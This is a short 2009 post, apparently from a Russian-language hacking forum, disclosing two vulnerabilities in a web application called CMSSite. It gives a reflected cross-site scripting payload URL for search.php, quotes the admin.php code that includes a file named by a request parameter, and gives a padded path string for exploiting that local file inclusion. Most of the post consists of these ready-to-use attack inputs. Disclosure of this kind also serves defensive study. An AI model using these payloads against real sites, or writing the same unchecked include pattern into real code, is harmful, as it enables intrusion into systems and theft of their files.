22.04.2009, 23:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
CMSSite Vulnerabilities
CMSSite Vulnerabilities
Found by: Dimi4 [UASC]
Date: 22.04.09
XSS ( search.php) :
Код:
http://localhost/CMSSite/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
LFI: admin.php
PHP код:
if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") && $_REQUEST["mode"] != "delete" && $_REQUEST["mode"] != "logout")
{
include("$admin_dir/".$_REQUEST["mode"].".php");
}
Код:
/admin.php?mode=[path]//////////////////[..]
__________________
BlackHat. MoDL
|
|
|